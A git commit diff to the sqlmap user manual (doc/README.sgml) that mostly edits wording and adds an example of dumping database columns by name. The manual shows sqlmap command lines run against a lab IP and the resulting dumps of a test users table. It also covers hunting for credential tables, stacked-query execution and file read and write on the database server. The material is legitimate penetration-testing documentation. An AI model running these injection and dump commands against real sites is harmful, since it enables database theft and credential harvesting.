mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-26 03:23:48 +03:00
update
This commit is contained in:
parent
ef7666c12b
commit
63880e3121
207
doc/README.sgml
207
doc/README.sgml
|
@ -325,7 +325,7 @@ custom application credentials.
|
||||||
|
|
||||||
<item>Support to <bf>run custom SQL statement(s)</bf> as in an interactive
|
<item>Support to <bf>run custom SQL statement(s)</bf> as in an interactive
|
||||||
SQL client connecting to the back-end database. sqlmap automatically
|
SQL client connecting to the back-end database. sqlmap automatically
|
||||||
dissects the provided statement, determins which technique to use to
|
dissects the provided statement, determines which technique to use to
|
||||||
inject it and how to pack the SQL payload accordingly.
|
inject it and how to pack the SQL payload accordingly.
|
||||||
</itemize>
|
</itemize>
|
||||||
|
|
||||||
|
@ -3338,10 +3338,12 @@ Options: <tt>-</tt><tt>-dump</tt>, <tt>-C</tt>, <tt>-T</tt>, <tt>-D</tt>,
|
||||||
and <tt>-</tt><tt>-last</tt>
|
and <tt>-</tt><tt>-last</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
It is possible to dump the entries for a specific database table.
|
It is possible to dump table entries.
|
||||||
This functionality depends on the option <tt>-T</tt> to specify the table
|
This functionality depends on the option <tt>-T</tt> to specify the table
|
||||||
name or the option <tt>-C</tt> to specify the column name and optionally
|
name or on the option <tt>-C</tt> to specify the column name and,
|
||||||
on <tt>-D</tt> to specify the database name.
|
optionally on <tt>-D</tt> to specify the database name.
|
||||||
|
|
||||||
|
<p>
|
||||||
If the table name is specified, but the database name is not, the current
|
If the table name is specified, but the database name is not, the current
|
||||||
database name is used.
|
database name is used.
|
||||||
|
|
||||||
|
@ -3355,31 +3357,31 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --du
|
||||||
[...]
|
[...]
|
||||||
back-end DBMS: MySQL >= 5.0.0
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
[17:51:41] [WARNING] missing database parameter, sqlmap is going to use the current
|
[hh:mm:41] [WARNING] missing database parameter, sqlmap is going to use the current
|
||||||
database to dump table 'users' entries
|
database to dump table 'users' entries
|
||||||
[17:51:41] [INFO] fetching current database
|
[hh:mm:41] [INFO] fetching current database
|
||||||
[17:51:41] [INFO] retrieved: testdb
|
[hh:mm:41] [INFO] retrieved: testdb
|
||||||
[17:51:41] [INFO] fetching columns for table 'users' on database 'testdb'
|
[hh:mm:41] [INFO] fetching columns for table 'users' on database 'testdb'
|
||||||
[17:51:41] [INFO] fetching number of columns for table 'users' on database 'testdb'
|
[hh:mm:41] [INFO] fetching number of columns for table 'users' on database 'testdb'
|
||||||
[17:51:41] [INFO] retrieved: 3
|
[hh:mm:41] [INFO] retrieved: 3
|
||||||
[17:51:41] [INFO] retrieved: id
|
[hh:mm:41] [INFO] retrieved: id
|
||||||
[17:51:41] [INFO] retrieved: name
|
[hh:mm:41] [INFO] retrieved: name
|
||||||
[17:51:41] [INFO] retrieved: surname
|
[hh:mm:41] [INFO] retrieved: surname
|
||||||
[17:51:41] [INFO] fetching entries for table 'users' on database 'testdb'
|
[hh:mm:41] [INFO] fetching entries for table 'users' on database 'testdb'
|
||||||
[17:51:41] [INFO] fetching number of entries for table 'users' on database 'testdb'
|
[hh:mm:41] [INFO] fetching number of entries for table 'users' on database 'testdb'
|
||||||
[17:51:41] [INFO] retrieved: 4
|
[hh:mm:41] [INFO] retrieved: 4
|
||||||
[17:51:41] [INFO] retrieved: 1
|
[hh:mm:41] [INFO] retrieved: 1
|
||||||
[17:51:42] [INFO] retrieved: luther
|
[hh:mm:42] [INFO] retrieved: luther
|
||||||
[17:51:42] [INFO] retrieved: blissett
|
[hh:mm:42] [INFO] retrieved: blissett
|
||||||
[17:51:42] [INFO] retrieved: 2
|
[hh:mm:42] [INFO] retrieved: 2
|
||||||
[17:51:42] [INFO] retrieved: fluffy
|
[hh:mm:42] [INFO] retrieved: fluffy
|
||||||
[17:51:42] [INFO] retrieved: bunny
|
[hh:mm:42] [INFO] retrieved: bunny
|
||||||
[17:51:42] [INFO] retrieved: 3
|
[hh:mm:42] [INFO] retrieved: 3
|
||||||
[17:51:42] [INFO] retrieved: wu
|
[hh:mm:42] [INFO] retrieved: wu
|
||||||
[17:51:42] [INFO] retrieved: ming
|
[hh:mm:42] [INFO] retrieved: ming
|
||||||
[17:51:43] [INFO] retrieved: 4
|
[hh:mm:43] [INFO] retrieved: 4
|
||||||
[17:51:43] [INFO] retrieved:
|
[hh:mm:43] [INFO] retrieved:
|
||||||
[17:51:43] [INFO] retrieved: nameisnull
|
[hh:mm:43] [INFO] retrieved: nameisnull
|
||||||
Database: testdb
|
Database: testdb
|
||||||
Table: users
|
Table: users
|
||||||
[4 entries]
|
[4 entries]
|
||||||
|
@ -3418,6 +3420,84 @@ Table: users
|
||||||
+-------------------+
|
+-------------------+
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
|
<p>
|
||||||
|
If only the column name is specified, sqlmap will enumerate and ask the
|
||||||
|
user to dump all databases' tables containing user provided column(s).
|
||||||
|
This feature can be useful to identify, for instance, tables containing
|
||||||
|
custom application credentials.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Example on a <bf>MySQL 5.0.67</bf> target:
|
||||||
|
|
||||||
|
<tscreen><verb>
|
||||||
|
$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 --dump \
|
||||||
|
-C "urna"
|
||||||
|
|
||||||
|
[...]
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
|
do you want sqlmap to consider provided column(s):
|
||||||
|
[1] as LIKE column names (default)
|
||||||
|
[2] as exact column names
|
||||||
|
> 1
|
||||||
|
[19:18:08] [INFO] fetching databases with tables containing columns like 'urna'
|
||||||
|
[19:18:08] [INFO] fetching number of databases with tables containing columns like
|
||||||
|
'urna'
|
||||||
|
[19:18:08] [INFO] retrieved: 1
|
||||||
|
[19:18:08] [INFO] retrieved: testdb
|
||||||
|
[19:18:10] [INFO] fetching tables containing columns like 'urna' in database 'testdb'
|
||||||
|
[19:18:10] [INFO] fetching number of tables containing columns like 'urna' in
|
||||||
|
database 'testdb'
|
||||||
|
[19:18:10] [INFO] retrieved: 1
|
||||||
|
[19:18:10] [INFO] retrieved: users
|
||||||
|
[19:18:10] [INFO] fetching columns like 'urna' for table 'users' on database 'testdb'
|
||||||
|
[19:18:10] [INFO] fetching number of columns for table 'users' on database 'testdb'
|
||||||
|
[19:18:10] [INFO] retrieved: 1
|
||||||
|
[19:18:10] [INFO] retrieved: surname
|
||||||
|
Columns like 'urna' were found in the following databases:
|
||||||
|
Database: testdb
|
||||||
|
Table: users
|
||||||
|
[1 column]
|
||||||
|
+---------+
|
||||||
|
| Column |
|
||||||
|
+---------+
|
||||||
|
| surname |
|
||||||
|
+---------+
|
||||||
|
|
||||||
|
do you want to dump entries? [Y/n] y
|
||||||
|
which database(s)?
|
||||||
|
[a]ll (default)
|
||||||
|
[testdb]
|
||||||
|
[q]uit
|
||||||
|
>
|
||||||
|
which table(s) of database 'testdb'?
|
||||||
|
[a]ll (default)
|
||||||
|
[users]
|
||||||
|
[s]kip
|
||||||
|
[q]uit
|
||||||
|
>
|
||||||
|
[19:18:23] [INFO] fetching columns 'surname' entries for table 'users' on
|
||||||
|
database 'testdb'
|
||||||
|
[19:18:23] [INFO] fetching number of columns 'surname' entries for table
|
||||||
|
'users' on database 'testdb'
|
||||||
|
[19:18:23] [INFO] retrieved: 4
|
||||||
|
[19:18:23] [INFO] retrieved: blissett
|
||||||
|
[19:18:23] [INFO] retrieved: bunny
|
||||||
|
[19:18:23] [INFO] retrieved: ming
|
||||||
|
[19:18:23] [INFO] retrieved: nameisnull
|
||||||
|
Database: testdb
|
||||||
|
Table: users
|
||||||
|
[4 entries]
|
||||||
|
+------------+
|
||||||
|
| surname |
|
||||||
|
+------------+
|
||||||
|
| blissett |
|
||||||
|
| bunny |
|
||||||
|
| ming |
|
||||||
|
| nameisnull |
|
||||||
|
+------------+
|
||||||
|
</verb></tscreen>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
sqlmap also stores for each table the dumped entries in a CSV format file.
|
sqlmap also stores for each table the dumped entries in a CSV format file.
|
||||||
You can see the absolute path where sqlmap stores the dumped tables entries
|
You can see the absolute path where sqlmap stores the dumped tables entries
|
||||||
|
@ -3448,8 +3528,8 @@ Table: users
|
||||||
172.16.213.131/dump/public/users.csv'
|
172.16.213.131/dump/public/users.csv'
|
||||||
[...]
|
[...]
|
||||||
|
|
||||||
$ cat /software/sqlmap/output/172.16.213.131/dump/public/users.csv
|
$ cat ./output/172.16.213.131/dump/public/users.csv
|
||||||
"id","name","surname"
|
id,name,surname
|
||||||
"1","luther","blissett"
|
"1","luther","blissett"
|
||||||
"2","fluffy","bunny"
|
"2","fluffy","bunny"
|
||||||
"3","wu","ming"
|
"3","wu","ming"
|
||||||
|
@ -3459,13 +3539,13 @@ $ cat /software/sqlmap/output/172.16.213.131/dump/public/users.csv
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
You can also provide the <tt>-</tt><tt>-start</tt> and/or the <tt>-</tt><tt>-stop</tt>
|
You can also provide the <tt>-</tt><tt>-start</tt> and/or the <tt>-</tt><tt>-stop</tt>
|
||||||
options to limit the dump to a range of entries, while those entries can be further limited
|
options to limit the dump to a range of entries, while those entries can be further
|
||||||
to a range of character positions provided with <tt>-</tt><tt>-first</tt> and/or the
|
limited to a range of character positions provided with <tt>-</tt><tt>-first</tt>
|
||||||
<tt>-</tt><tt>-last</tt> options.
|
and/or the <tt>-</tt><tt>-last</tt> options:
|
||||||
|
|
||||||
<itemize>
|
<itemize>
|
||||||
<item><tt>-</tt><tt>-start</tt> specifies the first entry to enumerate
|
<item><tt>-</tt><tt>-start</tt> specifies the first entry to enumerate.
|
||||||
<item><tt>-</tt><tt>-stop</tt> specifies the last entry to enumerate
|
<item><tt>-</tt><tt>-stop</tt> specifies the last entry to enumerate.
|
||||||
</itemize>
|
</itemize>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
|
@ -3478,19 +3558,19 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --du
|
||||||
Database: testdb
|
Database: testdb
|
||||||
Table: users
|
Table: users
|
||||||
[3 entries]
|
[3 entries]
|
||||||
+----+----------------------------------------------+-------------------+
|
+----+--------------------------------------------+-------------------+
|
||||||
| id | name | surname |
|
| id | name | surname |
|
||||||
+----+----------------------------------------------+-------------------+
|
+----+--------------------------------------------+-------------------+
|
||||||
| 2 | fluffy | bunny |
|
| 2 | fluffy | bunny |
|
||||||
| 3 | wu | ming |
|
| 3 | wu | ming |
|
||||||
| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
|
| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
|
||||||
+----+----------------------------------------------+-------------------+
|
+----+--------------------------------------------+-------------------+
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
As you can see, sqlmap is very flexible. You can leave it to automatically
|
As you can see, sqlmap is very flexible. You can leave it to automatically
|
||||||
enumerate the whole database table up to a single column of a specific
|
enumerate the whole database table up to a range of characters of a single
|
||||||
table entry.
|
column of a specific table entry.
|
||||||
|
|
||||||
|
|
||||||
<sect2>Dump all databases tables entries
|
<sect2>Dump all databases tables entries
|
||||||
|
@ -3509,15 +3589,15 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --du
|
||||||
Database: testdb
|
Database: testdb
|
||||||
Table: users
|
Table: users
|
||||||
[5 entries]
|
[5 entries]
|
||||||
+----+----------------------------------------------+-------------------+
|
+----+--------------------------------------------+-------------------+
|
||||||
| id | name | surname |
|
| id | name | surname |
|
||||||
+----+----------------------------------------------+-------------------+
|
+----+--------------------------------------------+-------------------+
|
||||||
| 1 | luther | blissett |
|
| 1 | luther | blissett |
|
||||||
| 2 | fluffy | bunny |
|
| 2 | fluffy | bunny |
|
||||||
| 3 | wu | ming |
|
| 3 | wu | ming |
|
||||||
| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
|
| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
|
||||||
| 5 | NULL | nameisnull |
|
| 5 | NULL | nameisnull |
|
||||||
+----+----------------------------------------------+-------------------+
|
+----+--------------------------------------------+-------------------+
|
||||||
|
|
||||||
Database: information_schema
|
Database: information_schema
|
||||||
Table: CHARACTER_SETS
|
Table: CHARACTER_SETS
|
||||||
|
@ -3620,21 +3700,23 @@ considered a system database because some database administrators use it
|
||||||
as a users' database.
|
as a users' database.
|
||||||
|
|
||||||
|
|
||||||
<sect2>Run your own SQL statement
|
<sect2>Execute your SQL statement
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Options: <tt>-</tt><tt>-sql-query</tt> and <tt>-</tt><tt>-sql-shell</tt>
|
Options: <tt>-</tt><tt>-sql-query</tt> and <tt>-</tt><tt>-sql-shell</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
The SQL query and the SQL shell features makes the user able to run
|
The SQL query and the SQL shell features makes the user able to execute
|
||||||
custom SQL statement on the web application's back-end database management.
|
custom SQL statements on the web application's back-end database
|
||||||
sqlmap recognizes the type of SQL statement provided and automatically
|
management.
|
||||||
chooses which SQL injection technique to use for it to be able to execute it.
|
sqlmap automatically dissects the provided statement, determines which
|
||||||
If it is a <tt>SELECT</tt> statement it will retrieve its output through
|
technique to use to inject it and how to pack the SQL payload accordingly.
|
||||||
the blind SQL injection or UNION query SQL injection technique depending
|
|
||||||
on the user's options. Otherwise it will execute the query through the
|
If it is a <tt>SELECT</tt> statement, sqlmap will retrieve its output
|
||||||
stacked query SQL injection technique if the web application supports
|
through the blind SQL injection or UNION query SQL injection technique
|
||||||
multiple statements on the back-end database management system.
|
depending on the user's options. Otherwise it will execute the query
|
||||||
|
through the stacked query SQL injection technique if the web application
|
||||||
|
supports multiple statements on the back-end database management system.
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Examples on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
Examples on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
||||||
|
@ -3989,30 +4071,23 @@ the provided SQL statement in a multiple statement mode.
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Beware that some web application technologies do not support stacked
|
Beware that some web application technologies do not support stacked
|
||||||
queries on specific database management systems. For instance, PHP does not
|
queries on specific database management systems. For instance, PHP does
|
||||||
support stacked queries when the back-end DBMS is MySQL, but it does
|
not support stacked queries when the back-end DBMS is MySQL, but it does
|
||||||
support when the back-end DBMS is PostgreSQL.
|
support when the back-end DBMS is PostgreSQL.
|
||||||
|
|
||||||
|
|
||||||
<sect1>User-defined function injection
|
<sect1>User-defined function injection
|
||||||
|
|
||||||
<sect2>Inject custom user-injection functions
|
<sect2>Inject custom user-defined functions (UDF)
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Option: <tt>-</tt><tt>-udf-inject</tt>
|
Options: <tt>-</tt><tt>-udf-inject</tt> and <tt>-</tt><tt>-shared-lib</tt>
|
||||||
#TODO
|
|
||||||
|
|
||||||
|
|
||||||
<sect2>Local path of the shared library
|
|
||||||
|
|
||||||
<p>
|
|
||||||
Option: <tt>-</tt><tt>-shared-lib</tt>
|
|
||||||
#TODO
|
#TODO
|
||||||
|
|
||||||
|
|
||||||
<sect1>File system access
|
<sect1>File system access
|
||||||
|
|
||||||
<sect2>Read a file from the back-end DBMS file system
|
<sect2>Read a file from the database server's file system
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Option: <tt>-</tt><tt>-read-file</tt>
|
Option: <tt>-</tt><tt>-read-file</tt>
|
||||||
|
@ -4135,7 +4210,7 @@ output/172.16.213.131/files/C__example.exe: PE32 executable for MS Windows (GUI)
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
|
|
||||||
<sect2>Write a local file on the back-end DBMS file system
|
<sect2>Write a local file on the database server's file system
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Options: <tt>-</tt><tt>-write-file</tt> and <tt>-</tt><tt>-dest-file</tt>
|
Options: <tt>-</tt><tt>-write-file</tt> and <tt>-</tt><tt>-dest-file</tt>
|
||||||
|
|
Loading…
Reference in New Issue
Block a user